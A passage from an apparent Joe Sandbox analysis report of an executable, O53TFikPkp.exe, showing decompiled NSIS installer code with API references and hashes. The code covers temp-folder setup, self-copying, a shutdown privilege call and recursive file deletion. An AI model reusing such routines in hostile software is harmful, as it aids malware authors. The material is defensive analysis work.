                                                                                            											__eflags = _t52 - 0xffffffff;
                                                                                            											if(_t52 != 0xffffffff) {
                                                                                            												_v400 = _t52;
                                                                                            											}
                                                                                            											ExitProcess(_v400);
                                                                                            										}
                                                                                            										E00405346(_v408, 0x200010);
                                                                                            										ExitProcess(2);
                                                                                            									}
                                                                                            									if( *0x423ebc == 0) {
                                                                                            										L31:
                                                                                            										 *0x423f4c =  *0x423f4c | 0xffffffff;
                                                                                            										_v400 = E004035E3();
                                                                                            										goto L32;
                                                                                            									}
                                                                                            									_t103 = E004055A3(_t96, 0);
                                                                                            									while(_t103 >= _t96) {
                                                                                            										__eflags =  *_t103 - 0x3d3f5f20;
                                                                                            										if(__eflags == 0) {
                                                                                            											break;
                                                                                            										}
                                                                                            										_t103 = _t103 - 1;
                                                                                            										__eflags = _t103;
                                                                                            									}
                                                                                            									_t115 = _t103 - _t96;
                                                                                            									_v408 = "Error launching installer";
                                                                                            									if(_t103 < _t96) {
                                                                                            										lstrcatA(_t105, "~nsu.tmp");
                                                                                            										if(lstrcmpiA(_t105, "C:\\Users\\jones\\Desktop") == 0) {
                                                                                            											goto L32;
                                                                                            										}
                                                                                            										CreateDirectoryA(_t105, 0);
                                                                                            										SetCurrentDirectoryA(_t105);
                                                                                            										_t120 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                                                                            										if(_t120 == 0) {
                                                                                            											E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", "C:\\Users\\jones\\Desktop");
                                                                                            										}
                                                                                            										E00405A85(0x424000, _v396);
                                                                                            										 *0x424400 = 0x41;
                                                                                            										_t98 = 0x1a;
                                                                                            										do {
                                                                                            											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
                                                                                            											DeleteFileA(0x41f050);
                                                                                            											if(_v416 != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\O53TFikPkp.exe", 0x41f050, 1) != 0) {
                                                                                            												_push(0);
                                                                                            												_push(0x41f050);
                                                                                            												E004057D3();
                                                                                            												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
                                                                                            												_t79 = E004052E5(0x41f050);
                                                                                            												if(_t79 != 0) {
                                                                                            													CloseHandle(_t79);
                                                                                            													_v416 = 0;
                                                                                            												}
                                                                                            											}
                                                                                            											 *0x424400 =  *0x424400 + 1;
                                                                                            											_t98 = _t98 - 1;
                                                                                            										} while (_t98 != 0);
                                                                                            										_push(0);
                                                                                            										_push(_t105);
                                                                                            										E004057D3();
                                                                                            										goto L32;
                                                                                            									}
                                                                                            									 *_t103 = 0;
                                                                                            									_t104 = _t103 + 4;
                                                                                            									if(E00405659(_t115, _t103 + 4) == 0) {
                                                                                            										goto L32;
                                                                                            									}
                                                                                            									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                                            									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                                            									_v424 = 0;
                                                                                            									goto L31;
                                                                                            								}
                                                                                            								GetWindowsDirectoryA(_t105, 0x3fb);
                                                                                            								lstrcatA(_t105, "\\Temp");
                                                                                            								_t89 = E004031F1(_t110);
                                                                                            								_t111 = _t89;
                                                                                            								if(_t89 == 0) {
                                                                                            									goto L32;
                                                                                            								}
                                                                                            								goto L22;
                                                                                            							}
                                                                                            							goto L15;
                                                                                            						}
                                                                                            					} else {
                                                                                            						goto L4;
                                                                                            					}
                                                                                            					do {
                                                                                            						L4:
                                                                                            						_t44 = _t44 + 1;
                                                                                            						__eflags =  *_t44 - 0x20;
                                                                                            					} while ( *_t44 == 0x20);
                                                                                            					goto L5;
                                                                                            				}
                                                                                            				goto L20;
                                                                                            			}






































                                                                                            0x00403231
                                                                                            0x00403235
                                                                                            0x0040323d
                                                                                            0x0040323f
                                                                                            0x00403244
                                                                                            0x0040324f
                                                                                            0x00403256
                                                                                            0x0040325e
                                                                                            0x00403268
                                                                                            0x0040327e
                                                                                            0x0040328e
                                                                                            0x00403293
                                                                                            0x00403299
                                                                                            0x004032a0
                                                                                            0x004032b3
                                                                                            0x004032b8
                                                                                            0x004032ba
                                                                                            0x004032bc
                                                                                            0x004032c1
                                                                                            0x004032c1
                                                                                            0x004032d1
                                                                                            0x004032d7
                                                                                            0x00403340
                                                                                            0x00403340
                                                                                            0x00403342
                                                                                            0x00403344
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004032dd
                                                                                            0x004032e0
                                                                                            0x004032e8
                                                                                            0x004032e8
                                                                                            0x004032eb
                                                                                            0x004032f0
                                                                                            0x004032f2
                                                                                            0x004032f2
                                                                                            0x004032f3
                                                                                            0x004032f3
                                                                                            0x004032f8
                                                                                            0x004032fb
                                                                                            0x00403330
                                                                                            0x00403335
                                                                                            0x0040333a
                                                                                            0x0040333d
                                                                                            0x0040333f
                                                                                            0x0040333f
                                                                                            0x0040333f
                                                                                            0x00000000
                                                                                            0x004032fd
                                                                                            0x004032fd
                                                                                            0x004032fe
                                                                                            0x00403301
                                                                                            0x00403309
                                                                                            0x0040330c
                                                                                            0x0040330e
                                                                                            0x0040330e
                                                                                            0x0040330e
                                                                                            0x0040330c
                                                                                            0x00403311
                                                                                            0x00403317
                                                                                            0x0040331f
                                                                                            0x00403322
                                                                                            0x00403324
                                                                                            0x00403324
                                                                                            0x00403324
                                                                                            0x00403322
                                                                                            0x00403327
                                                                                            0x0040332e
                                                                                            0x00403348
                                                                                            0x0040334b
                                                                                            0x00403354
                                                                                            0x00403359
                                                                                            0x00403359
                                                                                            0x00403364
                                                                                            0x0040336a
                                                                                            0x0040336f
                                                                                            0x00403371
                                                                                            0x00403393
                                                                                            0x00403398
                                                                                            0x0040339f
                                                                                            0x004033a6
                                                                                            0x004033aa
                                                                                            0x00403411
                                                                                            0x00403411
                                                                                            0x00403416
                                                                                            0x00403420
                                                                                            0x0040350b
                                                                                            0x00403511
                                                                                            0x0040351c
                                                                                            0x00403525
                                                                                            0x00403527
                                                                                            0x0040352c
                                                                                            0x0040352e
                                                                                            0x00403530
                                                                                            0x00403532
                                                                                            0x00403534
                                                                                            0x00403536
                                                                                            0x00403538
                                                                                            0x00403548
                                                                                            0x0040354a
                                                                                            0x0040354c
                                                                                            0x00403559
                                                                                            0x00403568
                                                                                            0x00403570
                                                                                            0x00403578
                                                                                            0x00403578
                                                                                            0x0040354c
                                                                                            0x00403538
                                                                                            0x00403534
                                                                                            0x0040357d
                                                                                            0x00403583
                                                                                            0x00403585
                                                                                            0x00403589
                                                                                            0x00403589
                                                                                            0x00403585
                                                                                            0x0040358e
                                                                                            0x00403593
                                                                                            0x00403596
                                                                                            0x00403598
                                                                                            0x00403598
                                                                                            0x004035a0
                                                                                            0x004035a0
                                                                                            0x0040342f
                                                                                            0x00403436
                                                                                            0x00403436
                                                                                            0x004033b2
                                                                                            0x00403401
                                                                                            0x00403401
                                                                                            0x0040340d
                                                                                            0x00000000
                                                                                            0x0040340d
                                                                                            0x004033bb
                                                                                            0x004033c8
                                                                                            0x004033bf
                                                                                            0x004033c5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004033c7
                                                                                            0x004033c7
                                                                                            0x004033c7
                                                                                            0x004033cc
                                                                                            0x004033ce
                                                                                            0x004033d6
                                                                                            0x00403442
                                                                                            0x00403456
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040345a
                                                                                            0x00403461
                                                                                            0x00403467
                                                                                            0x0040346d
                                                                                            0x00403475
                                                                                            0x00403475
                                                                                            0x00403483
                                                                                            0x0040348a
                                                                                            0x00403493
                                                                                            0x00403499
                                                                                            0x004034a5
                                                                                            0x004034ab
                                                                                            0x004034b5
                                                                                            0x004034c9
                                                                                            0x004034ca
                                                                                            0x004034cb
                                                                                            0x004034dc
                                                                                            0x004034e2
                                                                                            0x004034e9
                                                                                            0x004034ec
                                                                                            0x004034f2
                                                                                            0x004034f2
                                                                                            0x004034e9
                                                                                            0x004034f6
                                                                                            0x004034fc
                                                                                            0x004034fc
                                                                                            0x004034ff
                                                                                            0x00403500
                                                                                            0x00403501
                                                                                            0x00000000
                                                                                            0x00403501
                                                                                            0x004033d8
                                                                                            0x004033da
                                                                                            0x004033e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004033ed
                                                                                            0x004033f8
                                                                                            0x004033fd
                                                                                            0x00000000
                                                                                            0x004033fd
                                                                                            0x00403379
                                                                                            0x00403385
                                                                                            0x0040338a
                                                                                            0x0040338f
                                                                                            0x00403391
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403391
                                                                                            0x00000000
                                                                                            0x0040332e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004032e2
                                                                                            0x004032e2
                                                                                            0x004032e2
                                                                                            0x004032e3
                                                                                            0x004032e3
                                                                                            0x00000000
                                                                                            0x004032e2
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • #17.COMCTL32 ref: 00403244
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                                                                                            • OleInitialize.OLE32(00000000), ref: 00403256
                                                                                              • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                                                                              • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                                                                              • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                                                                            • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                                                                                              • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                                                                                            • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\O53TFikPkp.exe" ,00000000), ref: 004032A6
                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\O53TFikPkp.exe" ,00000020), ref: 004032D1
                                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 00403398
                                                                                            • OleUninitialize.OLE32(00000000), ref: 00403416
                                                                                            • ExitProcess.KERNEL32 ref: 00403436
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\O53TFikPkp.exe" ,00000000,00000000), ref: 00403442
                                                                                            • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\O53TFikPkp.exe" ,00000000,00000000), ref: 0040344E
                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                                                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                                                                                            • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                                                                                            • CopyFileA.KERNEL32 ref: 004034BF
                                                                                            • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                                                                                            • ExitProcess.KERNEL32 ref: 004035A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                            • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\O53TFikPkp.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\O53TFikPkp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                            • API String ID: 2278157092-881743981
                                                                                            • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                                                                                            • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                                                                                            • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                                                                                            • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 259 405525-405528 257->259 261 405532-40553a call 405d7c 259->261 262 40552a-405530 259->262 261->253 272 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->272 262->253 266 40541f-405422 263->266 264->266 269 405424-40542b 266->269 270 40542d-405433 lstrcatA 266->270 269->270 271 405438-405456 lstrlenA FindFirstFileA 269->271 270->271 273 405513-405517 271->273 274 40545c-405473 call 4055a3 271->274 287 405553-405557 272->287 288 40556a-40556d call 404e23 272->288 273->257 276 405519 273->276 281 405475-405479 274->281 282 40547e-405481 274->282 276->257 281->282 284 40547b 281->284 285 405483-405488 282->285 286 405494-4054a2 call 405a85 282->286 284->282 290 4054f2-405504 FindNextFileA 285->290 291 40548a-40548c 285->291 298 4054a4-4054ac 286->298 299 4054b9-4054c8 call 40573d DeleteFileA 286->299 287->262 293 405559-405568 call 404e23 call 4057d3 287->293 288->253 290->274 296 40550a-40550d FindClose 290->296 291->286 294 40548e-405492 291->294 293->253 294->286 294->290 296->273 298->290 303 4054ae-4054b7 call 4053aa 298->303 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 303->290 308->290 310 4054d0-4054e0 call 404e23 call 4057d3 309->310 311 4054e2-4054e8 309->311 310->290 311->290
                                                                                            C-Code - Quality: 94%
                                                                                            			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v12;
                                                                                            				struct _WIN32_FIND_DATAA _v332;
                                                                                            				signed int _t37;
                                                                                            				char* _t49;
                                                                                            				signed int _t52;
                                                                                            				signed int _t55;
                                                                                            				signed int _t61;
                                                                                            				signed int _t63;
                                                                                            				void* _t65;
                                                                                            				signed int _t68;
                                                                                            				CHAR* _t70;
                                                                                            				CHAR* _t72;
                                                                                            				char* _t75;
                                                                                            
                                                                                            				_t72 = _a4;
                                                                                            				_t37 = E00405659(__eflags, _t72);
                                                                                            				_v12 = _t37;
                                                                                            				if((_a8 & 0x00000008) != 0) {
                                                                                            					_t63 = DeleteFileA(_t72); // executed
                                                                                            					asm("sbb eax, eax");
                                                                                            					_t65 =  ~_t63 + 1;
                                                                                            					 *0x423f28 =  *0x423f28 + _t65;
                                                                                            					return _t65;
                                                                                            				}
                                                                                            				_t68 = _a8 & 0x00000001;
                                                                                            				__eflags = _t68;
                                                                                            				_v8 = _t68;
                                                                                            				if(_t68 == 0) {
                                                                                            					L5:
                                                                                            					E00405A85(0x4214a0, _t72);
                                                                                            					__eflags = _t68;
                                                                                            					if(_t68 == 0) {
                                                                                            						E004055BF(_t72);
                                                                                            					} else {
                                                                                            						lstrcatA(0x4214a0, "\*.*");
                                                                                            					}
                                                                                            					__eflags =  *_t72;
                                                                                            					if( *_t72 != 0) {
                                                                                            						L10:
                                                                                            						lstrcatA(_t72, 0x40900c);
                                                                                            						L11:
                                                                                            						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                            						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                                                                                            						__eflags = _t37 - 0xffffffff;
                                                                                            						_a4 = _t37;
                                                                                            						if(_t37 == 0xffffffff) {
                                                                                            							L29:
                                                                                            							__eflags = _v8;
                                                                                            							if(_v8 != 0) {
                                                                                            								_t31 = _t70 - 1;
                                                                                            								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                            								__eflags =  *_t31;
                                                                                            							}
                                                                                            							goto L31;
                                                                                            						} else {
                                                                                            							goto L12;
                                                                                            						}
                                                                                            						do {
                                                                                            							L12:
                                                                                            							_t75 =  &(_v332.cFileName);
                                                                                            							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                                                                                            							__eflags =  *_t49;
                                                                                            							if( *_t49 != 0) {
                                                                                            								__eflags = _v332.cAlternateFileName;
                                                                                            								if(_v332.cAlternateFileName != 0) {
                                                                                            									_t75 =  &(_v332.cAlternateFileName);
                                                                                            								}
                                                                                            							}
                                                                                            							__eflags =  *_t75 - 0x2e;
                                                                                            							if( *_t75 != 0x2e) {
                                                                                            								L19:
                                                                                            								E00405A85(_t70, _t75);
                                                                                            								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                            								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                            									E0040573D(_t72);
                                                                                            									_t52 = DeleteFileA(_t72);
                                                                                            									__eflags = _t52;
                                                                                            									if(_t52 != 0) {
                                                                                            										E00404E23(0xfffffff2, _t72);
                                                                                            									} else {
                                                                                            										__eflags = _a8 & 0x00000004;
                                                                                            										if((_a8 & 0x00000004) == 0) {
                                                                                            											 *0x423f28 =  *0x423f28 + 1;
                                                                                            										} else {
                                                                                            											E00404E23(0xfffffff1, _t72);
                                                                                            											_push(0);
                                                                                            											_push(_t72);
                                                                                            											E004057D3();
                                                                                            										}
                                                                                            									}
                                                                                            								} else {
                                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                                            									if(__eflags == 0) {
                                                                                            										E004053AA(_t70, __eflags, _t72, _a8);
                                                                                            									}
                                                                                            								}
                                                                                            								goto L27;
                                                                                            							}
                                                                                            							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                            							__eflags = _t61;
                                                                                            							if(_t61 == 0) {
                                                                                            								goto L27;
                                                                                            							}
                                                                                            							__eflags = _t61 - 0x2e;
                                                                                            							if(_t61 != 0x2e) {
                                                                                            								goto L19;
                                                                                            							}
                                                                                            							__eflags =  *((char*)(_t75 + 2));
                                                                                            							if( *((char*)(_t75 + 2)) == 0) {
                                                                                            								goto L27;
                                                                                            							}
                                                                                            							goto L19;
                                                                                            							L27:
                                                                                            							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                            							__eflags = _t55;
                                                                                            						} while (_t55 != 0);
                                                                                            						_t37 = FindClose(_a4);
                                                                                            						goto L29;
                                                                                            					}
                                                                                            					__eflags =  *0x4214a0 - 0x5c;
                                                                                            					if( *0x4214a0 != 0x5c) {
                                                                                            						goto L11;
                                                                                            					}
                                                                                            					goto L10;
                                                                                            				} else {
                                                                                            					__eflags = _t37;
                                                                                            					if(_t37 == 0) {
                                                                                            						L31:
                                                                                            						__eflags = _v8;
                                                                                            						if(_v8 == 0) {
                                                                                            							L39:
                                                                                            							return _t37;
                                                                                            						}
                                                                                            						__eflags = _v12;
                                                                                            						if(_v12 != 0) {
                                                                                            							_t37 = E00405D7C(_t72);
                                                                                            							__eflags = _t37;
                                                                                            							if(_t37 == 0) {
                                                                                            								goto L39;
                                                                                            							}
                                                                                            							E00405578(_t72);
                                                                                            							E0040573D(_t72);
                                                                                            							_t37 = RemoveDirectoryA(_t72);
                                                                                            							__eflags = _t37;
                                                                                            							if(_t37 != 0) {
                                                                                            								return E00404E23(0xffffffe5, _t72);
                                                                                            							}
                                                                                            							__eflags = _a8 & 0x00000004;
                                                                                            							if((_a8 & 0x00000004) == 0) {
                                                                                            								goto L33;
                                                                                            							}
                                                                                            							E00404E23(0xfffffff1, _t72);
                                                                                            							_push(0);
                                                                                            							_push(_t72);
                                                                                            							return E004057D3();
                                                                                            						}
                                                                                            						L33:
                                                                                            						 *0x423f28 =  *0x423f28 + 1;
                                                                                            						return _t37;
                                                                                            					}
                                                                                            					__eflags = _a8 & 0x00000002;
                                                                                            					if((_a8 & 0x00000002) == 0) {
                                                                                            						goto L31;
                                                                                            					}
                                                                                            					goto L5;
                                                                                            				}
                                                                                            			}

















                                                                                            0x004053b5
                                                                                            0x004053b9
                                                                                            0x004053c2
                                                                                            0x004053c5
                                                                                            0x004053c8
                                                                                            0x004053d0
                                                                                            0x004053d2
                                                                                            0x004053d3
                                                                                            0x00000000
                                                                                            0x004053d3
                                                                                            0x004053e2
                                                                                            0x004053e2
                                                                                            0x004053e5
                                                                                            0x004053e8
                                                                                            0x004053fc
                                                                                            0x00405403
                                                                                            0x00405408
                                                                                            0x0040540a
                                                                                            0x0040541a
                                                                                            0x0040540c
                                                                                            0x00405412
                                                                                            0x00405412
                                                                                            0x0040541f
                                                                                            0x00405422
                                                                                            0x0040542d
                                                                                            0x00405433
                                                                                            0x00405438
                                                                                            0x00405448
                                                                                            0x0040544a
                                                                                            0x00405450
                                                                                            0x00405453
                                                                                            0x00405456
                                                                                            0x00405513
                                                                                            0x00405513
                                                                                            0x00405517
                                                                                            0x00405519
                                                                                            0x00405519
                                                                                            0x00405519
                                                                                            0x00405519
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040545c
                                                                                            0x0040545c
                                                                                            0x00405465
                                                                                            0x0040546b
                                                                                            0x00405470
                                                                                            0x00405473
                                                                                            0x00405475
                                                                                            0x00405479
                                                                                            0x0040547b
                                                                                            0x0040547b
                                                                                            0x00405479
                                                                                            0x0040547e
                                                                                            0x00405481
                                                                                            0x00405494
                                                                                            0x00405496
                                                                                            0x0040549b
                                                                                            0x004054a2
                                                                                            0x004054ba
                                                                                            0x004054c0
                                                                                            0x004054c6
                                                                                            0x004054c8
                                                                                            0x004054ed
                                                                                            0x004054ca
                                                                                            0x004054ca
                                                                                            0x004054ce
                                                                                            0x004054e2
                                                                                            0x004054d0
                                                                                            0x004054d3
                                                                                            0x004054d8
                                                                                            0x004054da
                                                                                            0x004054db
                                                                                            0x004054db
                                                                                            0x004054ce
                                                                                            0x004054a4
                                                                                            0x004054aa
                                                                                            0x004054ac
                                                                                            0x004054b2
                                                                                            0x004054b2
                                                                                            0x004054ac
                                                                                            0x00000000
                                                                                            0x004054a2
                                                                                            0x00405483
                                                                                            0x00405486
                                                                                            0x00405488
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040548a
                                                                                            0x0040548c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040548e
                                                                                            0x00405492
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004054f2
                                                                                            0x004054fc
                                                                                            0x00405502
                                                                                            0x00405502
                                                                                            0x0040550d
                                                                                            0x00000000
                                                                                            0x0040550d
                                                                                            0x00405424
                                                                                            0x0040542b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004053ea
                                                                                            0x004053ea
                                                                                            0x004053ec
                                                                                            0x0040551d
                                                                                            0x00405520
                                                                                            0x00405523
                                                                                            0x00405575
                                                                                            0x00405575
                                                                                            0x00405575
                                                                                            0x00405525
                                                                                            0x00405528
                                                                                            0x00405533
                                                                                            0x00405538
                                                                                            0x0040553a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040553d
                                                                                            0x00405543
                                                                                            0x00405549
                                                                                            0x0040554f
                                                                                            0x00405551
                                                                                            0x00000000
                                                                                            0x0040556d
                                                                                            0x00405553
                                                                                            0x00405557
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040555c
                                                                                            0x00405561
                                                                                            0x00405562
                                                                                            0x00000000
                                                                                            0x00405563
                                                                                            0x0040552a
                                                                                            0x0040552a
                                                                                            0x00000000
                                                                                            0x0040552a
                                                                                            0x004053f2
                                                                                            0x004053f6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004053f6

                                                                                            APIs
                                                                                            • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 004053C8
                                                                                            • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 00405412
                                                                                            • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 00405433
                                                                                            • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 00405439
                                                                                            • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 0040544A
                                                                                            • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                                                                                            • FindClose.KERNEL32(?), ref: 0040550D
                                                                                            Strings
                                                                                            • "C:\Users\user\Desktop\O53TFikPkp.exe" , xrefs: 004053B4
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                                                                                            • \*.*, xrefs: 0040540C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\O53TFikPkp.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-2456506678
                                                                                            • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                                                                                            • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                                                                                            • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                                                                                            • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
